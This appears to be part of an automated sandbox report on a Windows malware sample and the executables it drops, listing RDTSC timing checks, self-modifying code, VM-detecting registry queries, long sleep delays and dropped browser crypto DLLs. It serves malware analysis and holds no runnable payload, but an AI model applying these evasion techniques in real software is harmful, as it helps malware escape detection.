Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F63E6 second address: 7F6421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8D38B7BC88h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 movsx esi, di 0x00000028 push eax 0x00000029 jc 00007F8D38B7BC98h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F6421 second address: 7F6425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F899F second address: 7F89A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F89A3 second address: 7F8A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F8D38E56382h 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D3318h] 0x00000017 call 00007F8D38E56387h 0x0000001c mov si, DAFCh 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 ja 00007F8D38E5638Ch 0x00000029 push 00000000h 0x0000002b mov si, FA81h 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 pushad 0x00000034 popad 0x00000035 pop ecx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F8A20 second address: 7F8A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8D38B7BC86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F8A2A second address: 7F8A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D38E5637Eh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F9A09 second address: 7F9A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F9A0E second address: 7F9A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7F9A14 second address: 7F9A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F8D38B7BC88h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call 00007F8D38B7BC99h 0x0000002a cmc 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e mov di, CE5Eh 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 xor edx, 2CAE15FEh 0x0000003b mov ebx, dword ptr [ebp+122D3A7Bh] 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 pushad 0x00000044 jmp 00007F8D38B7BC8Dh 0x00000049 push ebx 0x0000004a jo 00007F8D38B7BC86h 0x00000050 pop ebx 0x00000051 popad 0x00000052 push eax 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jl 00007F8D38B7BC86h 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	RDTSC instruction interceptor: First address: 7FA3AA second address: 7FA3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: E1E9D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: E1EA37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Special instruction interceptor: First address: 64FC4A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Special instruction interceptor: First address: 7ED8A1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Special instruction interceptor: First address: 64FC50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Special instruction interceptor: First address: 800C18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Special instruction interceptor: First address: FAEC70 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Special instruction interceptor: First address: 1037F38 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3BEC70 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 447F38 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Special instruction interceptor: First address: 32DC87 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Special instruction interceptor: First address: 4E15C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Special instruction interceptor: First address: 57897E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 25EC70 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 2E7F38 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Special instruction interceptor: First address: 38DC87 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Special instruction interceptor: First address: 5415C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Special instruction interceptor: First address: 5D897E instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Memory allocated: 54C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Memory allocated: 5710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Memory allocated: 54C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Memory allocated: 4C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Memory allocated: 4F30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Memory allocated: 4D20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Memory allocated: 5560000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Memory allocated: 5760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Memory allocated: 55A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Memory allocated: 2C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Memory allocated: F60000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 606
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 571
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 665
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 663
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 613
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 571
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4793
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4959
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5619
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4273
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1884
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3573
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 438
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6797
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7915
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 372
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1759
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3207
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3147
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5431

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071549001\13426522e9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071547001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071551001\2ac0b54336.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071542001\ede25bd9a2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cBeNU75[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071546001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071541001\07ab034c92.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071543001\298e6cea90.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071548001\Bjkm5hE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071550001\c9cc93b583.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe	Jump to dropped file

Source: C:\Users\user\Desktop\random.exe TID: 7432	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 7476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe TID: 7724	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7824	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7992	Thread sleep count: 606 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7992	Thread sleep time: -1212606s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2060	Thread sleep count: 571 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2060	Thread sleep time: -1142571s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep count: 177 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep time: -5310000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5408	Thread sleep count: 665 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5408	Thread sleep time: -1330665s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2648	Thread sleep count: 663 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2648	Thread sleep time: -1326663s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep count: 613 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep time: -1226613s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6964	Thread sleep count: 571 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6964	Thread sleep time: -1142571s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7996	Thread sleep count: 582 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7996	Thread sleep time: -1164582s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE TID: 8072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868	Thread sleep count: 1884 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4248	Thread sleep count: 262 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476	Thread sleep count: 2799 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1896	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184	Thread sleep count: 3573 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184	Thread sleep count: 438 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5268	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4544	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep count: 5289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep count: 2777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648	Thread sleep count: 7915 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6828	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696	Thread sleep count: 372 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep count: 7011 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep count: 1759 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE TID: 5236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep count: 1952 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364	Thread sleep count: 287 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep count: 3207 > 30
